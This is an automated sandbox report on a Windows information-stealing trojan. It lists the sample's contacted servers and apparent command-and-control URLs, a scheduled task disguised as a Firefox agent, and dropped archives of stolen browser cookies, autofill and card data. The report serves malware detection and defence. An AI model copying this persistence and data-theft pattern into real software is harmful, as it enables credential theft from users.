http://x1.i.lencr.org/0	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff7	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff0	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org0	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://telete.in/xylichanjk	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp, 49B.exe, 00000016.00000002.645248645.0000000003023000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
https://telete.in/org/img/t_logo.png	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://secureteam.net/webservices/CreateErrorReport	B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://realete.in/	49B.exe, 00000016.00000000.448155898.0000000003018000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	svchost.exe, 00000005.00000002.621112588.000002A5C12AD000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000003.289477965.0000026037232000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000B.00000003.311236895.0000026037240000.00000004.00000001.sdmp	false		high
https://activity.windows.comr	svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcffftd	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000002.311781895.000002603724E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000B.00000002.311751818.000002603723B000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
188.34.200.103	unknown	Germany	24940	HETZNER-ASDE	false
188.119.112.104	unknown	Russian Federation	50673	SERVERIUS-ASNL	false
185.49.70.90	unknown	United Kingdom	28753	LEASEWEB-DE-FRA-10DE	true
74.114.154.18	eduarroma.tumblr.com	Canada	2635	AUTOMATTICUS	false
212.224.105.79	readinglistforaugust3.xyz	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	false
95.213.224.6	readinglistforaugust2.xyz	Russian Federation	49505	SELECTELRU	false
195.201.225.248	telete.in	Germany	24940	HETZNER-ASDE	false
172.67.216.236	swretjhwrtj.gq	United States	13335	CLOUDFLARENETUS	false
185.230.143.48	unknown	Russian Federation	59504	HostingvpsvilleruRU	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	470442
Start date:	24.08.2021
Start time:	08:47:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	GzsKHwvBmG.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@64/25@428/11
EGA Information:	Failed
HDC Information:	Successful, ratio: 78.6% (good quality ratio 58.8%) Quality average: 45.5% Quality standard deviation: 34.6%
HCA Information:	Successful, ratio: 91% Number of executed functions: 157 Number of non-executed functions: 135
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.209.183, 40.112.88.60, 80.67.82.211, 80.67.82.235, 104.26.13.31, 172.67.75.172, 104.26.12.31, 20.82.210.154, 23.50.97.185, 20.54.110.249 Excluded domains from analysis (whitelisted): auth.api.np.ac.playstation.net.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, auth.api.np.ac.playstation.net.edgekey.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, e13674.b.akamaiedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:48:16	API Interceptor	2x Sleep call for process: svchost.exe modified
08:48:59	Task Scheduler	Run new task: Firefox Default Browser Agent 07EDFB76AD58957D path: C:\Users\user\AppData\Roaming\hhiwwui
08:49:20	API Interceptor	2x Sleep call for process: explorer.exe modified
08:49:34	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
08:49:46	API Interceptor	99x Sleep call for process: B72.exe modified
08:50:16	API Interceptor	1x Sleep call for process: 49B.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\d06ed635-68f6-4e9a-955c-4899f5f57b9a9880353267.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	96:hY6sEOp9kiSJ+qY4msC53yNNqSKgwF8wFoaY4KRAF61c:hYR9bkia9Y4mwNjXA8WRKR3c
MD5:	F48451D0054D75DBEFF6328DA0BF0AD5
SHA1:	F2526455CDCC7C9661C938D30532224FBDF2FAD6
SHA-256:	A08F8BF657181BC2D2AD8D90B70939C23777B88923959A40914A005F0D556D27
SHA-512:	223E82A101D7423594AEFED00AD6098E86FCB0DAC01E9E8443D113E034BE4FA5AC974FD78F3CE3FE7984D2B0978B291FD3409BF274D3D6577E3FE587BCE93181
Malicious:	false
Reputation:	unknown
Preview:	PK........<~.S............#.../Autofill/Google Chrome_Default.txtUT.....%a..%a..%a..PK........<~.S............#.../Autofill/Google Chrome_Default.txtUT.....%a..%a..%aPK........<~.S................/CC/Google Chrome_Default.txtUT.....%a..%a..%a..PK........<~.S................/CC/Google Chrome_Default.txtUT.....%a..%a..%aPK........8~.S................/Cookies/Edge_Cookies.txtUT.....%a..%a..%a..PK........8~.S................/Cookies/Edge_Cookies.txtUT.....%a..%a..%aPK........:~.S............".../Cookies/Google Chrome_Default.txtUT.....%a..%a..%a-.r.0......Q....C...H.T...RRs...j%.}.~..Z..{.ke.Q..X/....@.: .......\..^..8.i..^.6.s.".._s^_@5...L7.-.R.......O....f..N~.]O9b..[N........vL.].e?...<&.$..U.V..F.......Tp..s..C.0\|1..AY.l.....PK........:~.S..qu........".../Cookies/Google Chrome_Default.txtUT.....%a..%a..%aPK........8~.S................/Cookies/IE_Cookies.txtUT.....%a..%a..%a..PK........8~.S................/Cookies/IE_Cookies.txtUT.....%a..%a..%aPK........<~.S............$.../

C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6:PkopYjdt38FfrfXoL2fgsQvYf6gOOr7kmh:copYxt3efJQAf6h2omh
MD5:	C4EBAFA07BE27655244E42B8F1151887
SHA1:	6462D6E731E6A06E92E1A2CBC547FC750E114A67
SHA-256:	EA80C2FBBF9258C495719B8E4284E7462826E61EDD2E706AFD46226DBC7C0E27
SHA-512:	80B3FC32559AB487C93C37E9B6A86803E6159A36FC84ADF1C5F71128784003A6CC5EE66134ABB0D56DCE433939FD419586B137B5D473152166FED73225EC8DA6
Malicious:	false
Reputation:	unknown
Preview:	.google.com.FALSE./.FALSE.1617281028.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..

C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Files\11111.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Reputation:	unknown
Preview:	PK....................

C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\information.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	192:oOIO/cSQZHnMKWanBnpgBdQXRsg8qbNqqN:RxEBZHnMmnBnpgUX2MboqN
MD5:	5BA5C9F2CA0D4ED03D70EA47DDC5FBC8
SHA1:	26F04A8CE0D4A5DF4ACA4CD4D80AEF33450ACB3C
SHA-256:	B797C40E477DE434F4050101CBD21828B006DC549974F90F2059AAC2E7DC2A43
SHA-512:	1E099BEC5F37AE7304BB4E0223492982B3DCAFE9D3E7BFC4BA82A11F68EADA7857EAE68E3421730F2BF226082307A3F1B2106192D717BC98414E65B585CC4427
Malicious:	false
Reputation:	unknown
Preview:	Version: 40.1....Date: Tue Aug 24 08:49:30 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\AppData\Local\Temp\E61.exe ..Work Dir: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N ....Windows: Windows 10 Pro [x64]..Computer Name: 830021..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 24/8/2021 8:49:30..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [296]..- csrss.exe [388]..- wininit.exe [460]..- csrss.exe [472]..- services.exe [556]..- winlogon.exe [564]..- lsass.exe [584]..- fontdrvhost.exe [680]..- fontdrvhost.exe [688]..- svchost.exe [708]..- svchost.exe [792]..- svchost.e

C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\temp Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	768:PoiWBBjkoiWBBjN20olG4oNQraFB/JraFB/Q:AiQindo6QLQG
MD5:	9653810690994AC16905DC06471B8597
SHA1:	2A583B4D86270D5A0676A475ECFFE90CA570D74D
SHA-256:	E55A2047B2CA9D2F9EDC0CFE0126F5E9644D3311BC0BBA7125EF7E5BB00A2D85
SHA-512:	786D1708751189D35098E011B225FEEC6041169FB36ADE133EC0F24C81B35F8E9677A7F2CA6E4EDD8683558CF41E87BFC39217BB0C6DBDA4E54E1E513EB4A813
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5975205178815473
Encrypted:	false
SSDEEP:	6:b3Pk1GaD0JOCEfMuaaD0JOCEfMKQmDX/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:b3EGaD0JcaaD0JwQQX/tAg/0bjSQJ
MD5:	4BCA6356B0AD77BBC9D4FACD069D7FF4
SHA1:	20F8C5704FA0F05CFE33550695C0F7342581911D
SHA-256:	39DA0D1C1C2D465E8EC363D2A12C2F5563456D212907E9BDD6BA3DBF42AB90E3
SHA-512:	849C9B1B72DFB6237F2F1F3177A6DF7BDEC2FFA470CC9C1396D684BFD6E930B2965D78D9F2CFD13FA842EC1C6D52CA8ABFC802F005C17CDD406E93C8F3379BBD
Malicious:	false
Reputation:	unknown
Preview:	....E..h..(......0...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................0...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xb97a3d91, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09634889083106046
Encrypted:	false
SSDEEP:	6:uZ9Gzwl/+PaXRIE11Y8TRXkwAlqKAZ9Gzwl/+PaXRIE11Y8TRXkwAlqK:0G0+PaXO4blkdUKiG0+PaXO4blkdUK
MD5:	F79CB90000B51411713B6C1EC3795207
SHA1:	375FFB61CF058671D4C4F9AE50063D966EDEF40A
SHA-256:	400AF7D0642BB9E9B97BD40DAAF5A87972BF5BE235BA6BD176EB240BFBDDA914
SHA-512:	2166D4343078F5AAD6501F4BE0EE5C4F835769654CEC3F67ABBD20CDFC761E6D43A59AE844C9960FB0C25932B7F5652FB6FCC7ACC3EAE3F2FB8E0CA704CC4E95
Malicious:	false
Reputation:	unknown
Preview:	.z=.... ................e.f.3...w........................&..........w...0...yw.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................z}.!.0...yw.....................0...yw.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11119763936004139
Encrypted:	false
SSDEEP:	3:s9S/TEv1Ft+Al/bJdAtieXvYl/all:sM/aZ+At4BAlG
MD5:	E4BDD76EA0EDDB6B15B2C63CFE707D2B
SHA1:	F7C5F63524B329C0F1D464F079C297C96CF6F38D
SHA-256:	F1A727E0C014F4BF685BD92EACFACE686E026DD089C0AE1E80BC0029AC31FC05
SHA-512:	27040214234803168ED9E7EA1A5FFCB1992C1D087B05F481E11F4B33622BFC2511257667C12AF480B8FA9E0F2AD872CC7FF2CCF3169D0E5EF15944D405598D8F
Malicious:	false
Reputation:	unknown
Preview:	..".....................................3...w...0...yw......w...............w.......w....:O.....w......................0...yw.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C6.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6951752979275727
Encrypted:	false
SSDEEP:	96:9GiZYWMYz/K+nrYiYf5WXwHaYEZt+0tGiKQmQCwMg7a4B7n8yI7Y3:9jZDMYVxOua4B7n8V7Y3
MD5:	C8707962138D7A626C33630E0F01B596
SHA1:	4FB3C69C095E1523726C692485AC166A309C64C5
SHA-256:	6625F94019142908C43DCBF028A6426BEE029ED73B7924880FBA91F5DD0771AA
SHA-512:	3C0205ADF13C86110DBDCA57CE66007FEDE475EB81FE5E9D0FF306FEAD6F11FAC0CAF9C84AD2AEA443A87945B4415A5EC715904A7F6ED4266F943B41CDE26E37
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BCB.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	55766
Entropy (8bit):	3.0349310848848687
Encrypted:	false
SSDEEP:	1536:qKH1RtE2222FMlQwieeLQuf5INGj3aqbRg71:qKH1RtE2222FMlQwieeLQuf5I0j3aqbG
MD5:	EB5BBC42FC9B895F6894456BDB8017CF
SHA1:	B4D84462129B83510AB27D106DE6588D0584BBF7
SHA-256:	799C26FF6C19F40E9FF5FC41DDF68011247DACEE3595D2A4C5B869ABEA178FF1
SHA-512:	7616EA7248D49C121594DCEE2FA192ECBA5DCC65B9DC70C50035339799277B6105CBE8F590E4506A0A7B54C6B6BC0AF25C8DF33A7A6FB194F7EA4D27AB90CAE2
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3242.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696370369083541
Encrypted:	false
SSDEEP:	96:9GiZYWGQtghx3YUYhuWVHdYEZANztGiJQwQlwzyKLaBKd1L78IIR3:9jZDGlDcGNtDaMd1L77IR3
MD5:	A373AF2697E0F1186826AEE69B80E9FA
SHA1:	20C19B3B25E769A1EC79D163666D491C6C91F1B6
SHA-256:	42864E3D520ED13A0FFE8AFD9ECE78CFD43F4F20F54ADEA1138C28FDDB53935D
SHA-512:	45CB1604D93F6212BA5BDBD2EF0BFFEF4A2C612D327835A5059ECC7A4F3C139752358D519E6691B5C05AF6E0D98A087691F45E573DFDC5DC34DEB57F96061636
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER42DD.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	55938
Entropy (8bit):	3.0344409465152755
Encrypted:	false
SSDEEP:	1536:WnHI9PMeu22IFM6QqieeGew5INsA1KbHDdjbpbav:WnHI9PMeu22IFM6QqieeGew5IeA1KbHU
MD5:	9BB7877E03D5BD4B08C690C864198D9B
SHA1:	634781BB3ECDA6618E14A63B7B2D7E51DF69B89D
SHA-256:	9F0D92FD6B8D323C35BB4E61620D33AD9C119080EBECF140FA779152F45351B2
SHA-512:	EDD8265B044DEA2E20FA71F06CF2C298CC57EFB4CD674DF0463691C5278C8BCB011D61C4B57F9F4E8BA721D48A960CEB227F300D547DA00A4DE71EA0930BDC40
Malicious:	false
Reputation:	unknown
